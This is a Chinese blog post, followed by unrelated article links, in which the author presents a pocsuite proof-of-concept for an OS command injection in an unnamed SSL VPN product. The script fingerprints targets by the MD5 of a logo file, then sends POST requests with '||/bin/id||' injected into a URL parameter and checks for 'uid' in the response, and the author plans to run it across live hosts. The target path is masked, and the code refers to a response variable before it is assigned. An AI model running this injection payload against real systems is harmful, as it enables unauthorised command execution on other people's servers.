今天在测试中发现一个命令执行漏洞,尝试用创宇的pocsuite框架实现。说实话,这玩意儿确实没有自己写POC顺手,非得就着他的标准来,就很难受,以至于耽误了很多时间在规范上。。

影响参数后直接用||连接,然后定位linux命令如||/bin/id||

下面是代码部分,大体思路就是发送一个含有payload的post请求,由于涉及一些隐私,我下面的一些地方做了打码:

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 """

 Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)

 See the file 'docs/COPYING' for copying permission

 """

 #命令行

 from pocsuite import pocsuite_cli

 #验证模块

 from pocsuite import pocsuite_verify

 #攻击模块

 from pocsuite import pocsuite_attack

 #控制台模式

 from pocsuite import pocsuite_console

 from pocsuite.api.request import req

 from pocsuite.api.poc import register

 from pocsuite.api.poc import Output, POCBase

 class SSL_VPN(POCBase):

     vulID = ''  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0

     version = '' #默认为1

     vulDate = '2017-11-21' #漏洞公开的时间,不知道就写今天

     author = 'colorway' #  PoC作者的大名

     createDate = '2017-11-21'# 编写 PoC 的日期

     updateDate = '2017-11-21'# PoC 更新的时间,默认和编写时间一样

     references = []# 漏洞地址来源,0day不用写

     name = 'OS Command Injection'# PoC 名称

     appPowerLink = '#'# 漏洞厂商主页地址

     appName = '#'# 漏洞应用名称

     appVersion = 'all versions'# 漏洞影响版本

     vulType = 'Command Injection'#漏洞类型,类型参考见 漏洞类型规范表

     desc = '''

         攻击者可拼接系统命令getshell

     ''' # 漏洞简要描述

     samples = []# 测试样列,就是用 PoC 测试成功的网站

     install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写

     #验证漏洞 pocsuite -r xxxx-OS-Injection.py -f ip.txt --verify

     def _verify(self):

         #定义返回结果

         import hashlib

         import re

         result = {}

         #获取漏洞url

         vul_url = self.url + '/xx/xx/xx.php?xx=xx&t=1&h=127.0.0.1&p=80&c=1||/bin/id||'

         vul1_url = vul_url.replace('http', 'https')

         test_url = self.url + '/images/logo.gif'

         test1_url = test_url.replace('http', 'https')

         # print test_url

         # print test1_url

         r = req.get(test_url)

         r1 = req.get(test1_url, verify=False)

         if hashlib.md5(r1.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' or hashlib.md5(r2.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx':

             data = "xxx=1&xxx=1&auth=10&user_name=11&pass=111&xxxx=xxxx"

             cookies = {'xxxx':'aaaa','admin_token':''}

             r2 = req.post(vul_url, data=data, cookies=cookies)

             r3 = req.post(vul1_url, data=data, cookies=cookies, verify=False)

             if "uid" in r2.content or "uid" in r3.content:

                 result['VerifyInfo'] = {}

                 result['VerifyInfo']['URL'] = self.url

                 result['VerifyInfo']['Payload'] = vul_url             # print r2.content

         return self.save_output(result)

     #漏洞攻击

     def _attack(self):

         result = {}

         # 攻击代码

         return self._verify()

     def save_output(self, result):

         #判断有无结果并输出

         output = Output(self)

         if result:

             output.success(result)

         else:

             output.fail()

         return output

 register(SSL_VPN)

这里我先做了指纹识别,判断目标网站是否有logo并且logo所在文件的MD5值是否正确,是的话进入下面的代码。其他的地方就是我加了https的验证,因为一般资产导入的都是IP地址,前面没有协议的名字,所以我采用了判断两次的方法(感觉是一个笨方法,但目前没有想到其他方法,控制台参数里也没有启用https的参数选项)

今天晚上跑一下存活主机,看看明天能跑出多少台来,嘻嘻。

pocsuite 实现一个verify检测功能的更多相关文章

  1. 打造一个自动检测页面是否存在XSS的小插件

    前言: 还记得刚玩Web安全时,就想着要是能有一个自动挖掘XSS漏洞的软件就好了.然后我发现了Safe3.JSky.AWVS.Netsparker等等,但是误报太多,而且特别占内存.后来发现了fidd ...

  2. [C++]Linux之网络实时检测功能

    声明:如需引用或者摘抄本博文源码或者其文章的,请在显著处注明,来源于本博文/作者,以示尊重劳动成果,助力开源精神.也欢迎大家一起探讨,交流,以共同进步,乃至成为朋友- 0.0 由于学习操作系统实验课程 ...

  3. weblogic 反序列化补丁绕过漏洞的一个批量检测shell脚本(CVE-2017-3248 )

    ~ 以下内容,仅供学习参考 ~ weblogic 反序列化补丁绕过漏洞已经出了两个月了,balabala ~~~ 废话不说,拿到该漏洞的利用工具weblogic.jar,但只能一个个检测ip和端口,效 ...

  4. 第15.4节 PyCharm程序代码检测功能介绍

    老猿使用PyCharm有将近一个月了,发现PyCharm并不能很好的完成语法检查,有时运行时突然终止,仔细核查却发现是基本的语法错误,不过有次无意中移动鼠标到代码最右边的边框时发现其实PyCharm有 ...

  5. 算法与数据结构题目的 PHP 实现:栈和队列 设计一个有 getMin 功能的栈

    刚入手了一本<程序员代码面试指南>,书中题目的代码都是 Java 实现的,琢磨着把这些代码用 PHP 敲一遍,加深印象. 题目:设计一个有 getMin 功能的栈 —— 实现一个特殊的栈, ...

  6. ado.net实现一个通知公告功能

    一.建立相应的数据库,此处就不多说了,相信大家都非常了解

  7. 设计一个有getMin功能的栈

    [说明]: 本文是左程云老师所著的<程序员面试代码指南>第一章中“设计一个有getMin功能的栈”这一题目的C++复现. 本文只包含问题描述.C++代码的实现以及简单的思路,不包含解析说明 ...

  8. SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表

    SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表 SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表 2013-10-09 23:09 by BI Wor ...

  9. 吴恩达机器学习笔记54-开发与评价一个异常检测系统及其与监督学习的对比(Developing and Evaluating an Anomaly Detection System and the Comparison to Supervised Learning)

    一.开发与评价一个异常检测系统 异常检测算法是一个非监督学习算法,意味着我们无法根据结果变量

随机推荐

  1. $bzoj1007-HAOI2008$ 水平可见直线 下凸包

    题面描述 在\(xOy\)直角坐标平面上有\(n\)条直线\(L_1,L_2,...,L_n\),若在\(y\)值为正无穷大处往下看,能见到\(L_i\)的某个子线段,则称\(L_i\)为可见的,否则 ...

  2. 案例41-hibernate练习-添加客户

    1 utils部分 1 HibernateUtils package www.test.utils; import org.hibernate.Session; import org.hibernat ...

  3. [Matlab] fprintf

    %s format as a string%d format with no fractional part (integer format)%f format as a oating-point v ...

  4. artDialog组件应用学习(一)

    个人觉得artDialog是一组很不错的对话框组件.写的是artDialog_v6应用. 官方称其兼容性测试通过:IE6~IE11.Chrome.Firefox.Safari.Opera. 官网:ht ...

  5. 05.File类的学习

    File  是文件的意思 File类是一个静态类,所以File类是一个工具类 File类是专门操作文件的类 File的常用方法 namespace _16.File类的学习 { class Progr ...

  6. PAT 1042 Shuffling Machine

    #include <cstdio> #include <cstdlib> #include <vector> using namespace std; ] = {' ...

  7. SQL语句执行与结果集的获取

    title: SQL语句执行与结果集的获取 tags: [OLEDB, 数据库编程, VC++, 数据库] date: 2018-01-28 09:22:10 categories: windows ...

  8. configparser模块——配置文档

    configparser模块用于生成和修改常见配置文档. 预制配置文件:conf.ini [DEFAULT] ServerAliveInterval = 45 Compression = yes Co ...

  9. String StringBuffer StringBuilder对比

    1.相同点 三者都可以用来存储字符串类型数据. 2.不同点 String类型对象内容不可变,每变化一次都会创建一个新的对象. StringBuiler与StringBuffer的内容与长度均可以发生变 ...

  10. iOS开发之Objective-c的AES128加密和解密算法的实现

    #import <Foundation/Foundation.h> #import <CommonCrypto/CommonDigest.h> #import <Comm ...